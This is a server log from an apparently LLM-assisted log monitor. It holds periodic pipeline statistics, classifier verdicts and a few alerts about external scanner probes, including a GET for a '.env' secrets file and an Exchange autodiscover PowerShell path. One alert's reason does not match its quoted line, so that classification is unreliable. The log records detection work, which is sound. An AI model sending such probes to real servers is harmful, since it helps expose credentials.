Mar 20 04:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:19:01.941806 [observer] Pipeline: processed=1538 pattern_hits=1512 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:19:01.941837 [observer] Patterns: hash=1512 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:19:31.942896 [observer] Pipeline: processed=1540 pattern_hits=1514 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:19:31.942925 [observer] Patterns: hash=1514 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:20:01.945862 [observer] Pipeline: processed=1542 pattern_hits=1516 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:20:01.945897 [observer] Patterns: hash=1516 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:20:31.936650 [observer] Pipeline: processed=1546 pattern_hits=1520 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:20:31.936677 [observer] Patterns: hash=1520 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:21:01.953509 [observer] Pipeline: processed=1548 pattern_hits=1522 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:21:01.953686 [observer] Patterns: hash=1522 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:21:31.934603 [observer] Pipeline: processed=1552 pattern_hits=1526 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:21:31.934633 [observer] Patterns: hash=1526 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:22:01.956133 [observer] Pipeline: processed=1556 pattern_hits=1530 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:22:01.956192 [observer] Patterns: hash=1530 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:22:31.934904 [observer] Pipeline: processed=1560 pattern_hits=1534 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:22:31.934933 [observer] Patterns: hash=1534 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:23:01.936410 [observer] Pipeline: processed=1562 pattern_hits=1536 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:23:01.936433 [observer] Patterns: hash=1536 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:23:31.949108 [observer] Pipeline: processed=1564 pattern_hits=1538 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:23:31.949297 [observer] Patterns: hash=1538 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:24:01.940576 [observer] Pipeline: processed=1568 pattern_hits=1542 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:24:01.940609 [observer] Patterns: hash=1542 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:24:31.939199 [observer] Pipeline: processed=1570 pattern_hits=1544 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:24:31.939222 [observer] Patterns: hash=1544 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:25:02.044944 [observer] Pipeline: processed=1574 pattern_hits=1548 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:25:02.049448 [observer] Patterns: hash=1548 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:25:31.933618 [observer] Pipeline: processed=1576 pattern_hits=1550 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:25:31.933642 [observer] Patterns: hash=1550 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:26:01.948219 [observer] Pipeline: processed=1580 pattern_hits=1554 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:26:01.948250 [observer] Patterns: hash=1554 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:26:31.943804 [observer] Pipeline: processed=1582 pattern_hits=1556 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:26:31.943831 [observer] Patterns: hash=1556 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:27:01.943593 [observer] Pipeline: processed=1586 pattern_hits=1560 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:27:01.943621 [observer] Patterns: hash=1560 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:27:31.934808 [observer] Pipeline: processed=1590 pattern_hits=1564 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:27:31.934831 [observer] Patterns: hash=1564 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:28:01.949761 [observer] Pipeline: processed=1592 pattern_hits=1566 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:28:01.949787 [observer] Patterns: hash=1566 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:28:31.933691 [observer] Pipeline: processed=1596 pattern_hits=1570 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:28:31.933715 [observer] Patterns: hash=1570 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:29:01.956945 [observer] Pipeline: processed=1598 pattern_hits=1572 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:29:01.956980 [observer] Patterns: hash=1572 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:29:31.933938 [observer] Pipeline: processed=1602 pattern_hits=1576 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:29:31.934126 [observer] Patterns: hash=1576 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:30:01.956912 [observer] Pipeline: processed=1604 pattern_hits=1578 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:30:01.957447 [observer] Patterns: hash=1578 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:30:31.951952 [observer] Pipeline: processed=1606 pattern_hits=1580 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:30:31.951985 [observer] Patterns: hash=1580 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:31:01.942115 [observer] Pipeline: processed=1610 pattern_hits=1584 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:31:01.942143 [observer] Patterns: hash=1584 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:31:31.933656 [observer] Pipeline: processed=1612 pattern_hits=1586 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:31:31.933678 [observer] Patterns: hash=1586 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:01.951793 [observer] Pipeline: processed=1618 pattern_hits=1592 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:01.951832 [observer] Patterns: hash=1592 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:31.946362 [observer] Pipeline: processed=1620 pattern_hits=1594 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:31.946387 [observer] Patterns: hash=1594 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:32:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:46.565427 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 04:32:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:32:46.565474 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 04:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:33:01.961437 [observer] Pipeline: processed=1625 pattern_hits=1598 llm_calls=27 llm_errors=0 learned=0
Mar 20 04:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:33:01.961491 [observer] Patterns: hash=1598 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=27
Mar 20 04:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:33:31.934880 [observer] Pipeline: processed=1627 pattern_hits=1600 llm_calls=27 llm_errors=0 learned=0
Mar 20 04:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:33:31.934906 [observer] Patterns: hash=1600 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=27
Mar 20 04:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:01.954712 [observer] Pipeline: processed=1629 pattern_hits=1602 llm_calls=27 llm_errors=0 learned=0
Mar 20 04:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:01.954737 [observer] Patterns: hash=1602 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=27
Mar 20 04:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:31.937278 [observer] Pipeline: processed=1633 pattern_hits=1606 llm_calls=27 llm_errors=0 learned=0
Mar 20 04:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:31.937300 [observer] Patterns: hash=1606 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=27
Mar 20 04:34:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:50.543592 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 04:34:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:34:50.543637 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 04:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:00.255706 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.78 action=allow pattern_type=regex
Mar 20 04:35:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:00.255744 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 04:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:01.941595 [observer] Pipeline: processed=1638 pattern_hits=1608 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:01.941629 [observer] Patterns: hash=1608 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:35:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:04.842010 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 04:35:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:04.843197 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 04:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:31.934315 [observer] Pipeline: processed=1642 pattern_hits=1612 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:35:31.934339 [observer] Patterns: hash=1612 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:36:01.944942 [observer] Pipeline: processed=1644 pattern_hits=1614 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:36:01.944969 [observer] Patterns: hash=1614 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:36:31.935201 [observer] Pipeline: processed=1647 pattern_hits=1617 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:36:31.935227 [observer] Patterns: hash=1617 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:37:01.937498 [observer] Pipeline: processed=1650 pattern_hits=1620 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:37:01.937526 [observer] Patterns: hash=1620 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:37:31.944934 [observer] Pipeline: processed=1654 pattern_hits=1624 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:37:31.944964 [observer] Patterns: hash=1624 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:38:01.959536 [observer] Pipeline: processed=1658 pattern_hits=1628 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:38:01.959613 [observer] Patterns: hash=1628 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:38:31.942785 [observer] Pipeline: processed=1660 pattern_hits=1630 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:38:31.942813 [observer] Patterns: hash=1630 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:39:01.943339 [observer] Pipeline: processed=1664 pattern_hits=1634 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:39:01.943391 [observer] Patterns: hash=1634 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:39:31.937678 [observer] Pipeline: processed=1666 pattern_hits=1636 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:39:31.937705 [observer] Patterns: hash=1636 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:40:01.952103 [observer] Pipeline: processed=1669 pattern_hits=1639 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:40:01.953715 [observer] Patterns: hash=1639 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:40:31.934644 [observer] Pipeline: processed=1672 pattern_hits=1642 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:40:31.934675 [observer] Patterns: hash=1642 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:41:01.957555 [observer] Pipeline: processed=1674 pattern_hits=1644 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:41:01.957610 [observer] Patterns: hash=1644 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:41:31.933837 [observer] Pipeline: processed=1678 pattern_hits=1648 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:41:31.933861 [observer] Patterns: hash=1648 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:42:01.944837 [observer] Pipeline: processed=1680 pattern_hits=1650 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:42:01.944999 [observer] Patterns: hash=1650 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:42:31.934629 [observer] Pipeline: processed=1686 pattern_hits=1656 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:42:31.934658 [observer] Patterns: hash=1656 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:43:01.952713 [observer] Pipeline: processed=1688 pattern_hits=1658 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:43:01.952746 [observer] Patterns: hash=1658 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:43:31.933590 [observer] Pipeline: processed=1691 pattern_hits=1661 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:43:31.933612 [observer] Patterns: hash=1661 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:44:01.953186 [observer] Pipeline: processed=1694 pattern_hits=1664 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:44:01.953217 [observer] Patterns: hash=1664 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:44:31.950709 [observer] Pipeline: processed=1696 pattern_hits=1666 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:44:31.950736 [observer] Patterns: hash=1666 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:45:01.935729 [observer] Pipeline: processed=1700 pattern_hits=1670 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:45:01.935755 [observer] Patterns: hash=1670 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:45:31.948770 [observer] Pipeline: processed=1702 pattern_hits=1672 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:45:31.948798 [observer] Patterns: hash=1672 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:01.938768 [observer] Pipeline: processed=1706 pattern_hits=1676 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:01.938797 [observer] Patterns: hash=1676 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=30
Mar 20 04:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:20.198903 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T04:46:20.198599145Z 2026/03/20 04:46:20 [error] 422#422: *745238 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 146.103.1.108, server: _, request: "GE...
Mar 20 04:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:20.198973 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T04:46:20.198706223Z 146.103.1.108 - - [20/Mar/2026:04:46:20 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik...
Mar 20 04:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:20.678198 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T04:46:20.677883802Z 146.103.1.108 - - [20/Mar/2026:04:46:20 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Ge...
Mar 20 04:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:31.942989 [observer] Pipeline: processed=1711 pattern_hits=1681 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:46:31.943014 [observer] Patterns: hash=1681 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:47:01.942257 [observer] Pipeline: processed=1714 pattern_hits=1684 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:47:01.942293 [observer] Patterns: hash=1684 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:47:31.941489 [observer] Pipeline: processed=1719 pattern_hits=1689 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:47:31.941511 [observer] Patterns: hash=1689 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:48:01.951946 [observer] Pipeline: processed=1721 pattern_hits=1691 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:48:01.951983 [observer] Patterns: hash=1691 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:48:31.933656 [observer] Pipeline: processed=1725 pattern_hits=1695 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:48:31.933682 [observer] Patterns: hash=1695 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:49:01.951540 [observer] Pipeline: processed=1727 pattern_hits=1697 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:49:01.951569 [observer] Patterns: hash=1697 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:49:31.934874 [observer] Pipeline: processed=1731 pattern_hits=1701 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:49:31.934901 [observer] Patterns: hash=1701 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:50:01.941589 [observer] Pipeline: processed=1733 pattern_hits=1703 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:50:01.941621 [observer] Patterns: hash=1703 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:50:31.935419 [observer] Pipeline: processed=1736 pattern_hits=1706 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:50:31.935447 [observer] Patterns: hash=1706 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:51:01.950289 [observer] Pipeline: processed=1739 pattern_hits=1709 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:51:01.950315 [observer] Patterns: hash=1709 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:51:31.935287 [observer] Pipeline: processed=1741 pattern_hits=1711 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:51:31.935309 [observer] Patterns: hash=1711 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:52:01.942260 [observer] Pipeline: processed=1745 pattern_hits=1715 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:52:01.942291 [observer] Patterns: hash=1715 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
Mar 20 04:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:52:31.941711 [observer] Pipeline: processed=1749 pattern_hits=1719 llm_calls=30 llm_errors=0 learned=0
Mar 20 04:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:52:31.941740 [observer] Patterns: hash=1719 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30
